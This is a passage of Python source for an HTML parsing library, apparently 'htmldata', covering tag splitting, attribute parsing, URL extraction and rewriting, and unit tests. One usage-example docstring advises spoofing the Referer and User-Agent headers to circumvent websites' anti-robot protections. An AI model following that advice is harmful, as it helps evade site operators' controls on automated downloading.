>>> html_split(' blah <tag text> more </tag stuff> ')
[' blah ', '<tag text>', ' more ', '</tag stuff>', ' ']
Tags begin with C{'<'} and end with C{'>'}.
The identity C{''.join(L) == s} is always satisfied.
Exceptions to the normal parsing of HTML tags:
C{'<script>'}, C{'<style>'}, and HTML comment tags ignore all HTML
until the closing pair, and are added as three elements:
>>> html_split(' blah<style><<<><></style><!-- hi -->' +
... ' <script language="Javascript"></>a</script>end')
[' blah', '<style>', '<<<><>', '</style>', '<!--', ' hi ', '-->',
' ', '<script language="Javascript">', '</>a', '</script>', 'end']
"""
s_lower = s.lower()
L = []
i = 0 # Index of char being processed
while i < len(s):
c = s[i]
if c == '<':
# Left bracket, handle various cases.
if s[i:i + len(_BEGIN_COMMENT)].startswith(_BEGIN_COMMENT):
# HTML begin comment tag, '<!--'. Scan for '-->'.
i2 = s.find(_END_COMMENT, i)
if i2 < 0:
# No '-->'. Append the remaining malformed content and stop.
L.append(s[i:])
break
else:
# Append the comment.
L.append(s[i:i2 + len(_END_COMMENT)])
i = i2 + len(_END_COMMENT)
elif s[i:i + len(_BEGIN_CDATA)].startswith(_BEGIN_CDATA):
# XHTML begin CDATA tag. Scan for ']]>'.
i2 = s.find(_END_CDATA, i)
if i2 < 0:
# No ']]>'. Append the remaining malformed content and stop.
L.append(s[i:])
break
else:
# Append the CDATA.
L.append(s[i:i2 + len(_END_CDATA)])
i = i2 + len(_END_CDATA)
else:
# Regular HTML tag. Scan for '>'.
orig_i = i
found = False
in_quot1 = False
in_quot2 = False
for i2 in range(i + 1, len(s)):
c2 = s[i2]
if c2 == '"' and not in_quot1:
in_quot2 = not in_quot2
# Only turn on double quote if it's in a realistic place.
if in_quot2 and not in_quot1:
if i2 > 0 and s[i2 - 1] not in [' ', '\t', '=']:
in_quot2 = False
elif c2 == "'" and not in_quot2:
in_quot1 = not in_quot1
# Only turn on single quote if it's in a realistic place.
if in_quot1 and not in_quot2:
if i2 > 0 and s[i2 - 1] not in [' ', '\t', '=']:
in_quot1 = False
elif c2 == '>' and (not in_quot2 and not in_quot1):
found = True
break
if not found:
# No end '>'. Append the rest as text.
L.append(s[i:])
break
else:
# Append the tag.
L.append(s[i:i2 + 1])
i = i2 + 1
# Check whether we found a special ignore tag, eg '<script>'
tagi = _ignore_tag_index(s, orig_i)
if tagi >= 0:
# It's an ignore tag. Scan for the end tag.
i2 = s_lower.find('<' + _IGNORE_TAGS[tagi][1], i)
if i2 < 0:
# No end tag. Append the rest as text.
L.append(s[i2:])
break
else:
# Append the text sandwiched between the tags.
L.append(s[i:i2])
# Catch the closing tag with the next loop iteration.
i = i2
else:
# Not a left bracket, append text up to next left bracket.
i2 = s.find('<', i)
if i2 < 0:
# No left brackets, append the rest as text.
L.append(s[i:])
break
else:
L.append(s[i:i2])
i = i2
return L
def _shlex_split(s):
"""
Like C{shlex.split}, but reversible, and for HTML.
Splits a string into a list C{L} of strings. List elements
contain either an HTML tag C{name=value} pair, an HTML name
singleton (eg C{"checked"}), or whitespace.
The identity C{''.join(L) == s} is always satisfied.
>>> _shlex_split('a=5 b="15" name="<NAME>"')
['a=5', ' ', 'b="15"', ' ', 'name="<NAME>"']
>>> _shlex_split('a = a5 b=#b19 name="foo bar" q="hi"')
['a = a5', ' ', 'b=#b19', ' ', 'name="foo bar"', ' ', 'q="hi"']
>>> _shlex_split('a="9"b="15"')
['a="9"', 'b="15"']
"""
ans = []
i = 0
while i < len(s):
c = s[i]
if c in string.whitespace:
# Whitespace. Add whitespace while found.
for i2 in range(i, len(s)):
if s[i2] not in string.whitespace:
break
# Include the entire string if the last char is whitespace.
if s[i2] in string.whitespace:
i2 += 1
ans.append(s[i:i2])
i = i2
else:
# Match 'name = "value"'
c = re.compile(r'[^ \t\n\r\f\v"\']+\s*\=\s*"[^"]*"')
m = c.match(s, i)
if m:
ans.append(s[i:m.end()])
i = m.end()
continue
# Match "name = 'value'"
c = re.compile(r'[^ \t\n\r\f\v"\']+\s*\=\s*\'[^\']*\'')
m = c.match(s, i)
if m:
ans.append(s[i:m.end()])
i = m.end()
continue
# Match 'name = value'
c = re.compile(r'[^ \t\n\r\f\v"\']+\s*\=\s*[^ \t\n\r\f\v"\']*')
m = c.match(s, i)
if m:
ans.append(s[i:m.end()])
i = m.end()
continue
# Match 'name'
c = re.compile(r'[^ \t\n\r\f\v"\']+')
m = c.match(s, i)
if m:
ans.append(s[i:m.end()])
i = m.end()
continue
# Couldn't match anything so far, so it's likely that the page
# has malformed quotes inside a tag. Add leading quotes
# and spaces to the previous field until we see something.
subadd = []
while i < len(s) and s[i] in ['"', "'", ' ', '\t']:
subadd.append(s[i])
i += 1
# Add whatever we could salvage from the situation and move on.
if len(subadd) > 0:
ans.append(''.join(subadd))
else:
# We totally failed at matching this character, so add it
# as a separate item and move on.
ans.append(s[i])
return ans
def _test_shlex_split():
"""
Unit test for L{_shlex_split}.
"""
assert _shlex_split('') == []
assert _shlex_split(' ') == [' ']
assert _shlex_split('a=5 b="15" name="<NAME>"') == \
['a=5', ' ', 'b="15"', ' ', 'name="<NAME>"']
assert _shlex_split('a=cvn b=32vsd c= 234jk\te d \t="hi"') == \
['a=cvn', ' ', 'b=32vsd', ' ', 'c= 234jk', '\t', 'e', ' ',
'd \t="hi"']
assert _shlex_split(' a b c d=e f g h i="jk" l mno = p ' + \
'qr = "st"') == \
[' ', 'a', ' ', 'b', ' ', 'c', ' ', 'd=e', ' ', 'f', ' ', \
'g', ' ', 'h', ' ', 'i="jk"', ' ', 'l', ' ', 'mno = p', \
' ', 'qr = "st"']
assert _shlex_split('a=5 b="9"c="15 dfkdfkj "d="25"') == \
['a=5', ' ', 'b="9"', 'c="15 dfkdfkj "', 'd="25"']
assert _shlex_split('a=5 b="9"c="15 dfkdfkj "d="25" e=4') == \
['a=5', ' ', 'b="9"', 'c="15 dfkdfkj "', 'd="25"', ' ', \
'e=4']
assert _shlex_split('a=5 b=\'9\'c=\'15 dfkdfkj \'d=\'25\' e=4') == \
['a=5', ' ', 'b=\'9\'', 'c=\'15 dfkdfkj \'', 'd=\'25\'', \
' ', 'e=4']
def _tag_dict(s):
"""
Helper routine: Extracts a dict from an HTML tag string.
>>> _tag_dict('bgcolor=#ffffff text="#000000" blink')
({'bgcolor':'#ffffff', 'text':'#000000', 'blink': None},
{'bgcolor':(0,7), 'text':(16,20), 'blink':(31,36)},
{'bgcolor':(8,15), 'text':(22,29), 'blink':(36,36)})
Returns a 3-tuple. First element is a dict of
C{(key, value)} pairs from the HTML tag. Second element
is a dict mapping keys to C{(start, end)} indices of the
key in the text. Third element maps keys to C{(start, end)}
indices of the value in the text.
Names are lowercased.
Raises C{ValueError} for unmatched quotes and other errors.
"""
d = _shlex_split(s)
attrs = {}
key_pos = {}
value_pos = {}
start = 0
for item in d:
end = start + len(item)
equals = item.find('=')
if equals >= 0:
# Contains an equals sign.
(k1, k2) = (start, start + equals)
(v1, v2) = (start + equals + 1, start + len(item))
# Strip spaces.
while k1 < k2 and s[k1] in string.whitespace: k1 += 1
while k1 < k2 and s[k2 - 1] in string.whitespace: k2 -= 1
while v1 < v2 and s[v1] in string.whitespace: v1 += 1
while v1 < v2 and s[v2 - 1] in string.whitespace: v2 -= 1
# Strip one pair of double quotes around value.
if v1 < v2 - 1 and s[v1] == '"' and s[v2 - 1] == '"':
v1 += 1
v2 -= 1
# Strip one pair of single quotes around value.
if v1 < v2 - 1 and s[v1] == "'" and s[v2 - 1] == "'":
v1 += 1
v2 -= 1
(key, value) = (s[k1:k2].lower(), s[v1:v2])
# Drop bad keys and values.
if '"' in key or "'" in key:
continue
if '"' in value and "'" in value:
continue
attrs[key] = value
key_pos[key] = (k1, k2)
value_pos[key] = (v1, v2)
elif item.split() == []:
# Whitespace. Ignore it.
pass
else:
# A single token, like 'blink'.
key = item.lower()
# Drop bad keys.
if '"' in key or "'" in key:
continue
attrs[key] = None
key_pos[key] = (start, end)
value_pos[key] = (end, end)
start = end
return (attrs, key_pos, value_pos)
def _test_tag_dict():
"""
Unit test for L{_tag_dict}.
"""
assert _tag_dict('') == ({}, {}, {})
assert _tag_dict(' \t\r \n\n \r\n ') == ({}, {}, {})
assert _tag_dict('bgcolor=#ffffff text="#000000" blink') == \
({'bgcolor':'#ffffff', 'text':'#000000', 'blink': None},
{'bgcolor':(0, 7), 'text':(16, 20), 'blink':(31, 36)},
{'bgcolor':(8, 15), 'text':(22, 29), 'blink':(36, 36)})
assert _tag_dict("bgcolor='#ffffff'text='#000000' blink") == \
({'bgcolor':'#ffffff', 'text':'#000000', 'blink': None},
{'bgcolor':(0, 7), 'text':(17, 21), 'blink':(32, 37)},
{'bgcolor':(9, 16), 'text':(23, 30), 'blink':(37, 37)})
s = ' \r\nbg = val text \t= "hi you" name\t e="5"\t\t\t\n'
(a, b, c) = _tag_dict(s)
assert a == {'text': 'hi you', 'bg': 'val', 'e': '5', 'name': None}
for key in list(a.keys()):
assert s[b[key][0]:b[key][1]] == key
if a[key] != None:
assert s[c[key][0]:c[key][1]] == a[key]
def _full_tag_extract(s):
"""
Like L{tagextract}, but different return format.
Returns a list of L{_HTMLTag} and L{_TextTag} instances.
The return format is very inconvenient for manipulating HTML, and
only will be useful if you want to find the exact locations where
tags occur in the original HTML document.
"""
L = _html_split(s)
# Starting position of each L[i] in s.
Lstart = [0] * len(L)
for i in range(1, len(L)):
Lstart[i] = Lstart[i - 1] + len(L[i - 1])
class NotTagError(Exception): pass
for (i, text) in _enumerate(L):
try:
# Is it an HTML tag?
is_tag = False
if len(text) >= 2 and text[0] == '<' and text[-1] == '>':
# Turn HTML tag text into (name, keyword_dict) tuple.
is_tag = True
is_special = False
if len(text) >= 2 and (text[1] == '!' or text[1] == '?'):
is_special = True
if is_special:
# A special tag such as XML directive or <!-- comment -->
pos = (Lstart[i], Lstart[i] + len(L[i]))
# Wrap inside an _HTMLTag object.
L[i] = _HTMLTag(pos, text[1:-1].strip(), {}, {}, {})
elif is_tag:
# If an HTML tag, strip brackets and handle what's left.
# Strip off '<>' and update offset.
orig_offset = 0
if len(text) >= 1 and text[0] == '<':
text = text[1:]
orig_offset = 1
if len(text) >= 1 and text[-1] == '>':
text = text[:-1]
if len(text) > 0 and text[-1] == '/':
rslash = True
text = text[:-1]
else:
rslash = False
m = re.search(r'\s', text)
first_space = -1
if m:
first_space = m.start()
if first_space < 0:
(name, dtext) = (text, '')
else:
name = text[:first_space]
dtext = text[first_space + 1:len(text)]
# Position of dtext relative to original text.
dtext_offset = len(name) + 1 + orig_offset # +1 for space.
# Lowercase everything except XML directives and comments.
if not name.startswith('!') and not name.startswith('?'):
name = name.strip().lower()
if rslash:
name += '/'
# Strip off spaces, and update dtext_offset as appropriate.
orig_dtext = dtext
dtext = dtext.strip()
dtext_offset += orig_dtext.index(dtext)
(attrs, key_pos, value_pos) = _tag_dict(dtext)
# Correct offsets in key_pos and value_pos.
for key in list(attrs.keys()):
key_pos[key] = (key_pos[key][0] + Lstart[i] + dtext_offset,
key_pos[key][1] + Lstart[i] + dtext_offset)
value_pos[key] = (value_pos[key][0] + Lstart[i] + dtext_offset,
value_pos[key][1] + Lstart[i] + dtext_offset)
pos = (Lstart[i], Lstart[i] + len(L[i]))
# Wrap inside an _HTMLTag object.
L[i] = _HTMLTag(pos, name, attrs, key_pos, value_pos)
else:
# Not an HTML tag.
raise NotTagError
except NotTagError:
# Wrap non-HTML strings inside a _TextTag object.
pos = (Lstart[i], Lstart[i] + len(L[i]))
L[i] = _TextTag(pos, L[i])
return L
class _HTMLTag:
"""
HTML tag extracted by L{_full_tag_extract}.
@ivar pos: C{(start, end)} indices of the entire tag in the
HTML document.
@ivar name: Name of tag. For example, C{'img'}.
@ivar attrs: Dictionary mapping tag attributes to corresponding
tag values.
Example:
>>> tag = _full_tag_extract('<a href="d.com">')[0]
>>> tag.attrs
{'href': 'd.com'}
Surrounding quotes are stripped from the values.
@ivar key_pos: Key position dict.
Maps the name of a tag attribute to C{(start, end)}
indices for the key string in the C{"key=value"}
HTML pair. Indices are absolute, where 0 is the
start of the HTML document.
Example:
>>> tag = _full_tag_extract('<a href="d.com">')[0]
>>> tag.key_pos['href']
(3, 7)
>>> '<a href="d.com">'[3:7]
'href'
@ivar value_pos: Value position dict.
Maps the name of a tag attribute to C{(start, end)}
indices for the value in the HTML document string.
Surrounding quotes are excluded from this range.
Indices are absolute, where 0 is the start of the
HTML document.
Example:
>>> tag = _full_tag_extract('<a href="d.com">')[0]
>>> tag.value_pos['href']
(9, 14)
>>> '<a href="d.com">'[9:14]
'd.com'
"""
def __init__(self, pos, name, attrs, key_pos, value_pos):
"""
Create an _HTMLTag object.
"""
self.pos = pos
self.name = name
self.attrs = attrs
self.key_pos = key_pos
self.value_pos = value_pos
class _TextTag:
"""
Text extracted from an HTML document by L{_full_tag_extract}.
@ivar text: Extracted text.
@ivar pos: C{(start, end)} indices of the text.
"""
def __init__(self, pos, text):
"""
Create a _TextTag object.
"""
self.pos = pos
self.text = text
# -------------------------------------------------------------------
# URL Editing
# -------------------------------------------------------------------
# Tags within which URLs may be found.
_URL_TAGS = ['a href', 'applet archive', 'applet code',
'applet codebase', 'area href', 'base href',
'blockquote cite', 'body background', 'del cite',
'form action', 'frame longdesc', 'frame src',
'head profile', 'iframe src', 'iframe longdesc',
'img src', 'img ismap', 'img longdesc', 'img usemap',
'input src', 'ins cite', 'link href', 'object archive',
'object codebase', 'object data', 'object usemap',
'script src', 'table background', 'tbody background',
'td background', 'tfoot background', 'th background',
'thead background', 'tr background']
_URL_TAGS = [tuple(s.split()) for s in _URL_TAGS]
def _finditer(pattern, string):
"""
Like C{re.finditer}, provided for compatibility with Python < 2.3.
Returns a list instead of an iterator. Otherwise the return format
is identical to C{re.finditer} (except possibly in the details of
empty matches).
"""
compiled = re.compile(pattern)
ans = []
start = 0
while True:
m = compiled.search(string, start)
if m:
ans.append(m)
else:
return ans
m_start = m.start(m.lastindex)
m_end = m.end(m.lastindex)
if m_end > m_start:
start = m_end
else:
start += 1
def _remove_comments(doc):
"""
Replaces commented out characters with spaces in a CSS document.
"""
ans = []
i = 0
while True:
i2 = doc.find('/*', i)
if i2 < 0:
ans += [doc[i:]]
break
ans += [doc[i:i2]]
i3 = doc.find('*/', i2 + 1)
if i3 < 0:
i3 = len(doc) - 2
ans += [' ' * (i3 - i2 + 2)]
i = i3 + 2
return ''.join(ans)
def _test_remove_comments():
"""
Unit test for L{_remove_comments}.
"""
s = '/*d s kjlsdf */*//*/*//**/**/*//**/a' * 50
assert len(_remove_comments(s)) == len(s)
s = '/**/' * 50 + '/*5845*/*/*//*/**/dfd' + '/*//**//'
assert len(_remove_comments(s)) == len(s)
s = 'a/**/' * 50 + '/**//**/////***/****/*//**//*/' * 5
assert len(_remove_comments(s)) == len(s)
s = 'hi /* foo */ hello /* bar!!!!! \n\n */ there!'
assert _remove_comments(s) == \
'hi hello there!'
def urlextract(doc, siteurl=None, mimetype='text/html'):
"""
Extract URLs from HTML or stylesheet.
Extracts only URLs that are linked to or embedded in the document.
Ignores plain text URLs that occur in the non-HTML part of the
document.
Returns a list of L{URLMatch} objects.
>>> L = urlextract('<img src="a.gif"><a href="www.google.com">')
>>> L[0].url
'a.gif'
>>> L[1].url
'www.google.com'
If C{siteurl} is specified, all URLs are made into absolute URLs
by assuming that C{doc} is located at the URL C{siteurl}.
>>> doc = '<img src="a.gif"><a href="/b.html">'
>>> L = urlextract(doc, 'http://www.python.org/~guido/')
>>> L[0].url
'http://www.python.org/~guido/a.gif'
>>> L[1].url
'http://www.python.org/b.html'
If C{mimetype} is C{"text/css"}, the document will be parsed
as a stylesheet.
If a stylesheet is embedded inside an HTML document, then
C{urlextract} will extract the URLs from both the HTML and the
stylesheet.
"""
mimetype = mimetype.lower()
if mimetype.split()[0] in _CSS_MIMETYPES:
doc = _remove_comments(doc)
# Match URLs within CSS stylesheet.
# Match url(blah) or url('blah') or url("blah").
L = _finditer(
r'''url\s*\(([^\r\n\("']*?)\)|''' +
r'''url\s*\(\s*"([^\r\n]*?)"\s*\)|''' +
r'''url\s*\(\s*'([^\r\n]*?)'\s*\)|''' +
r'''@import\s+([^ \t\r\n"';@\(\)]+)[^\r\n;@\(\)]*[\r\n;]|''' +
r'''@import\s+'([^ \t\r\n"';@\(\)]+)'[^\r\n;@\(\)]*[\r\n;]|''' +
r'''@import\s+"([^ \t\r\n"';\(\)']+)"[^\r\n;@\(\)]*[\r\n;]''',
doc + ';\n')
L = [(x.start(x.lastindex), x.end(x.lastindex)) for x in L]
ans = []
for (s, e) in L:
e = min(e, len(doc))
if e > s:
ans.append(URLMatch(doc, s, e, siteurl, False, True))
elif mimetype.split()[0] in _HTML_MIMETYPES:
# Match URLs within HTML document.
ans = []
L = _full_tag_extract(doc)
item = None
for i in range(len(L)):
prev_item = item
item = L[i]
# Handle string item (text) or tuple item (tag).
if isinstance(item, _TextTag):
# Current item is text.
if isinstance(prev_item, _HTMLTag) and prev_item.name == \
'style':
# And previous item is <style>. Process a stylesheet.
temp = urlextract(item.text, siteurl, 'text/css')
# Offset indices and add to ans.
for j in range(len(temp)):
temp[j].start += item.pos[0]
temp[j].end += item.pos[0]
ans += temp
else:
# Regular text. Ignore.
pass
else:
# Current item is a tag.
if 'style' in item.attrs:
# Process a stylesheet embedded in the 'style' attribute.
temp = urlextract(item.attrs['style'], siteurl, 'text/css')
# Offset indices and add to ans.
for j in range(len(temp)):
temp[j].start += item.value_pos['style'][0]
temp[j].end += item.value_pos['style'][0]
ans += temp
for (a, b) in _URL_TAGS:
if item.name.startswith(a) and b in list(item.attrs.keys()):
# Got one URL.
url = item.attrs[b]
# FIXME: Some HTML tag wants a URL list, look up which
# tag and make it a special case.
(start, end) = item.value_pos[b]
tag_name = a
tag_attr = b
tag_attrs = item.attrs
tag_index = i
tag = URLMatch(doc, start, end, siteurl, True, False, \
tag_attr, tag_attrs, tag_index, tag_name)
ans.append(tag)
# End of 'text/html' mimetype case.
else:
raise ValueError('unknown MIME type: ' + repr(mimetype))
# Filter the answer, removing duplicate matches.
start_end_map = {}
filtered_ans = []
for item in ans:
if (item.start, item.end) not in start_end_map:
start_end_map[(item.start, item.end)] = None
filtered_ans.append(item)
return filtered_ans
def _tuple_replace(s, Lindices, Lreplace):
"""
Replace slices of a string with new substrings.
Given a list of slice tuples in C{Lindices}, replace each slice
in C{s} with the corresponding replacement substring from
C{Lreplace}.
Example:
>>> _tuple_replace('0123456789',[(4,5),(6,9)],['abc', 'def'])
'0123abc5def9'
"""
ans = []
Lindices = Lindices[:]
Lindices.sort()
if len(Lindices) != len(Lreplace):
raise ValueError('lists differ in length')
for i in range(len(Lindices) - 1):
if Lindices[i][1] > Lindices[i + 1][0]:
raise ValueError('tuples overlap')
if Lindices[i][1] < Lindices[i][0]:
raise ValueError('invalid tuple')
if min(Lindices[i][0], Lindices[i][1]) < 0 or \
max(Lindices[i][0], Lindices[i][1]) >= len(s):
raise ValueError('bad index')
j = 0
offset = 0
for i in range(len(Lindices)):
len1 = Lindices[i][1] - Lindices[i][0]
len2 = len(Lreplace[i])
ans.append(s[j:Lindices[i][0] + offset])
ans.append(Lreplace[i])
j = Lindices[i][1]
ans.append(s[j:])
return ''.join(ans)
def _test_tuple_replace():
"""
Unit test for L{_tuple_replace}.
"""
assert _tuple_replace('', [], []) == ''
assert _tuple_replace('0123456789', [], []) == '0123456789'
assert _tuple_replace('0123456789', [(4, 5), (6, 9)], ['abc', 'def']) == \
'0123abc5def9'
assert _tuple_replace('01234567890123456789', \
[(1, 9), (13, 14), (16, 18)], ['abcd', 'efg', 'hijk']) == \
'0abcd9012efg45hijk89'
def urljoin(s, L):
"""
Write back document with modified URLs (reverses L{urlextract}).
Given a list C{L} of L{URLMatch} objects obtained from
L{urlextract}, substitutes changed URLs into the original
document C{s}, and returns the modified document.
One should only modify the C{.url} attribute of the L{URLMatch}
objects. The ordering of the URLs in the list is not important.
>>> doc = '<img src="a.png"><a href="b.png">'
>>> L = urlextract(doc)
>>> L[0].url = 'foo'
>>> L[1].url = 'bar'
>>> urljoin(doc, L)
'<img src="foo"><a href="bar">'
"""
return _tuple_replace(s, [(x.start, x.end) for x in L], \
[x.url for x in L])
def examples():
"""
Examples of the C{htmldata} module.
Example 1:
Print all absolutized URLs from Google.
Here we use L{urlextract} to obtain all URLs in the document.
>>> import urllib2, htmldata
>>> url = 'http://www.google.com/'
>>> contents = urllib2.urlopen(url).read()
>>> for u in htmldata.urlextract(contents, url):
... print u.url
...
http://www.google.com/images/logo.gif
http://www.google.com/search
(More output)
Note that the second argument to L{urlextract} causes the
URLs to be made absolute with respect to that base URL.
Example 2:
Print all image URLs from Google in relative form.
>>> import urllib2, htmldata
>>> url = 'http://www.google.com/'
>>> contents = urllib2.urlopen(url).read()
>>> for u in htmldata.urlextract(contents):
... if u.tag_name == 'img':
... print u.url
...
/images/logo.gif
Equivalently, one can use L{tagextract}, and look for occurrences
of C{<img>} tags. The L{urlextract} function is mostly a convenience
function for when one wants to extract and/or modify all URLs in a
document.
Example 3:
Replace all C{<a href>} links on Google with the Microsoft web page.
Here we use L{tagextract} to turn the HTML into a data structure,
and then loop over the in-order list of tags (items which are not
tuples are plain text, which is ignored).
>>> import urllib2, htmldata
>>> url = 'http://www.google.com/'
>>> contents = urllib2.urlopen(url).read()
>>> L = htmldata.tagextract(contents)
>>> for item in L:
... if isinstance(item, tuple) and item[0] == 'a':
... # It's an HTML <a> tag! Give it an href=.
... item[1]['href'] = 'http://www.microsoft.com/'
...
>>> htmldata.tagjoin(L)
(Microsoftized version of Google)
Example 4:
Make all URLs on an HTML document be absolute.
>>> import urllib2, htmldata
>>> url = 'http://www.google.com/'
>>> contents = urllib2.urlopen(url).read()
>>> htmldata.urljoin(htmldata.urlextract(contents, url))
(Google HTML page with absolute URLs)
Example 5:
Properly quote all HTML tag values for pedants.
>>> import urllib2, htmldata
>>> url = 'http://www.google.com/'
>>> contents = urllib2.urlopen(url).read()
>>> htmldata.tagjoin(htmldata.tagextract(contents))
(Properly quoted version of the original HTML)
Example 6:
Modify all URLs in a document so that they are appended
to our proxy CGI script C{http://mysite.com/proxy.cgi}.
>>> import urllib2, htmldata
>>> url = 'http://www.google.com/'
>>> contents = urllib2.urlopen(url).read()
>>> proxy_url = 'http://mysite.com/proxy.cgi?url='
>>> L = htmldata.urlextract(contents)
>>> for u in L:
... u.url = proxy_url + u.url
...
>>> htmldata.urljoin(L)
(Document with all URLs wrapped in our proxy script)
Example 7:
Download all images from a website.
>>> import urllib, htmldata, time
>>> url = 'http://www.google.com/'
>>> contents = urllib.urlopen(url).read()
>>> for u in htmldata.urlextract(contents, url):
... if u.tag_name == 'img':
... filename = urllib.quote_plus(u.url)
... urllib.urlretrieve(u.url, filename)
... time.sleep(0.5)
...
(Images are downloaded to the current directory)
Many sites will protect against bandwidth-draining robots by
checking the HTTP C{Referer} [sic] and C{User-Agent} fields.
To circumvent this, one can create a C{urllib2.Request} object
with a legitimate C{Referer} and a C{User-Agent} such as
C{"Mozilla/4.0 (compatible; MSIE 5.5)"}. Then use
C{urllib2.urlopen} to download the content. Be warned that some
website operators will respond to rapid robot requests by banning
the offending IP address.
"""
print(examples.__doc__)
class URLMatch:
"""
A matched URL inside an HTML document or stylesheet.
A list of C{URLMatch} objects is returned by L{urlextract}.
@ivar url: URL extracted.
@ivar start: Starting character index.
@ivar end: End character index.
@ivar in_html: C{True} if URL occurs within an HTML tag.
@ivar in_css: C{True} if URL occurs within a stylesheet.
@ivar tag_attr: Specific tag attribute in which URL occurs.
Example: C{'href'}.
C{None} if the URL does not occur within an HTML
tag.
@ivar tag_attrs: Dictionary of all tag attributes and values.
Example: C{{'src':'http://X','alt':'Img'}}.
C{None} if the URL does not occur within an HTML
tag.
@ivar tag_index: Index of the tag in the list that would be
generated by a call to L{tagextract}.
@ivar tag_name: HTML tag name in which URL occurs.
Example: C{'img'}.
C{None} if the URL does not occur within an HTML
tag.
"""
def __init__(self, doc, start, end, siteurl, in_html, in_css,
tag_attr=None, tag_attrs=None, tag_index=None,
tag_name=None):
"""
Create a URLMatch object.
"""
self.doc = doc
self.start = start
self.end = end
self.url = doc[start:end]
self.in_html = in_html
self.in_css = in_css
if siteurl != None:
self.url = urllib.parse.urljoin(siteurl, self.url)
self.tag_attr = tag_attr
self.tag_attrs = tag_attrs
self.tag_index = tag_index
self.tag_name = tag_name
def _cast_to_str(arg, str_class):
"""
Casts string components of several data structures to str_class.
Casts string, list of strings, or list of tuples (as returned by
L{tagextract}) such that all strings are made to type str_class.
"""
if _is_str(arg):
return str_class(arg)
elif isinstance(arg, list):
ans = []
for item in arg:
if _is_str(item):
ans.append(str_class(item))
elif isinstance(item, tuple) and len(item) == 2:
(a, b) = item
b_prime = {}
for (b_key, b_value) in list(b.items()):
if b_value is None:
b_prime[str_class(b_key)] = None
else:
b_prime[str_class(b_key)] = str_class(b_value)
ans.append((str_class(a), b_prime))
else:
raise ValueError('unknown argument type')
return ans
else:
raise ValueError('unknown argument type')
# -------------------------------------------------------------------
# Unit Tests: HTML <-> Data structure
# -------------------------------------------------------------------
def _test_tagextract(str_class=str):
"""
Unit tests for L{tagextract} and L{tagjoin}.
Strings are cast to the string class argument str_class.
"""
# Work around lack of nested scopes in Python <= 2.1.
def f(obj, str_class2=str_class):
return _cast_to_str(obj, str_class2)
# Simple HTML document to test.
doc1 = f('\n\n<Html><BODY bgcolor=#ffffff>Hi<h1>Ho</h1><br>' +
'<br /><img SRc="text%5f.gif"><TAG NOshow>' +
'<img test="5%ff" /></body></html>\nBye!\n')
doc2 = f('\r<HTML><!-- Comment<a href="blah"> --><hiYa><foo>' +
'<test tag="5" content=6><is broken=False><yay>' +
'<style><><>><</style><foo bar=5>end<!-- <!-- nested --> ' +
'<script language="JavaScript"><>!><!_!_!-->!_-></script>')
doc3 = f('\r\t< html >< tag> <!--comment--> <tag a = 5> ' +
'<foo \r\nbg = val text \t= "hi you" name\t e="5"\t\t\t\n>')
doc4 = f('<?xml ??><foo><!-- <img> --><!DOCTYPE blah""/>' +
'<![CDATA[ more and weirder<bar> ] ][]]><![C[DATA[[>' +
'<abc key=value><![CDATA[to eof')
doc5 = f('<a href="foobar/ \t="base="10" x="15"><a x="9"t="20">')
# -----------------------------------------------------------------
# Test _html_split()
# -----------------------------------------------------------------
s = doc1
assert s == f('').join(_html_split(s))
assert _html_split(s) == f(
['\n\n', '<Html>', '<BODY bgcolor=#ffffff>', 'Hi', '<h1>', 'Ho',
'</h1>', '<br>', '<br />', '<img SRc="text%5f.gif">',
'<TAG NOshow>', '<img test="5%ff" />', '</body>', '</html>',
'\nBye!\n'])
s = doc2
assert s == f('').join(_html_split(s))
# Test single quotes
s = doc2.replace(f('"'), f("'"))
assert s == f('').join(_html_split(s))
s = f('<!-- test weird comment <body> <html> --> <h1>Header' +
'</h1 value=10 a=11>')
assert s == f('').join(_html_split(s))
assert _html_split(s) == f(
['<!-- test weird comment <body> <html> -->', ' ',
'<h1>', 'Header', '</h1 value=10 a=11>'])
s = f('<!-- <!-- nested messed up --> blah ok <now> what<style>hi' +
'<><>></style><script language="Java"><aL><>><>></script>a')
assert s == f('').join(_html_split(s))
assert _html_split(s) == f(
['<!-- <!-- nested messed up -->', ' blah ok ', '<now>',
' what', '<style>', 'hi<><>>', '</style>',
'<script language="Java">', '<aL><>><>>', '</script>', 'a'])
s = f('<!-- ><# -->!<!-!._-><!-- aa--> <style><tag//</style> <tag ' +
'<tag <! <! -> <!-- </who< <who> tag> <huh-->-</style>' +
'</style<style>')
assert s == f('').join(_html_split(s))
assert _html_split(s) == f(
['<!-- ><# -->', '!', '<!-!._->', '<!-- aa-->',
' ', '<style>', '<tag//', '</style>', ' ', '<tag <tag <! <! ->',
' ', '<!-- </who< <who> tag> <huh-->', '-', '</style>',
'</style<style>'])
s = doc4
assert s == f('').join(_html_split(s))
assert _html_split(s) == f(
['<?xml ??>', '<foo>', '<!-- <img> -->', '<!DOCTYPE blah""/>',
'<![CDATA[ more and weirder<bar> ] ][]]>', '<![C[DATA[[>',
'<abc key=value>', '<![CDATA[to eof'])
# -----------------------------------------------------------------
# Test tagextract() and tagjoin()
# -----------------------------------------------------------------
# Test for whitespace handling in tags.
assert (tagextract('<a\n\t\t\t\v\rhref="a.png"\tsize=10>') ==
[('a', {'href': 'a.png', 'size': '10'})])
s = doc1
s2 = doc1.replace(f('"'), f("'")) # Test single quotes, too.
assert tagextract(f('')) == []
assert tagextract(s) == tagextract(s2) == \
f(['\n\n', ('html', {}), ('body', {'bgcolor': '#ffffff'}),
'Hi', ('h1', {}), 'Ho', ('/h1', {}), ('br', {}),
('br/', {}), ('img', {'src': 'text%5f.gif'}),
('tag', {'noshow': None}), ('img/', {'test': '5%ff'}),
('/body', {}), ('/html', {}), '\nBye!\n'])
s2 = f('\n\n<html><body bgcolor="#ffffff">Hi<h1>Ho</h1><br>' +
'<br /><img src="text%5f.gif"><tag noshow>' +
'<img test="5%ff" /></body></html>\nBye!\n')
assert tagjoin(tagextract(s)) == s2
doc2old = doc2
doc2 = f('\r<HTML><!-- Comment<a href="blah"> --><hiYa><foo>' +
'<test tag="5" content=6><is broken=False><yay>' +
'<style><><>><</style><foo bar=5>end<!-- <!-- nested --> ' +
'<script language="JavaScript"><>!><!_!_!-->!_-></script>')
assert doc2old == doc2
s = doc2
assert tagextract(s) == f(
['\r', ('html', {}), ('!-- Comment<a href="blah"> --', {}),
('hiya', {}), ('foo', {}),
('test', {'content': '6', 'tag': '5'}),
('is', {'broken': 'False'}), ('yay', {}), ('style', {}), '<><>><',
('/style', {}), ('foo', {'bar': '5'}), 'end',
('!-- <!-- nested --', {}), ' ',
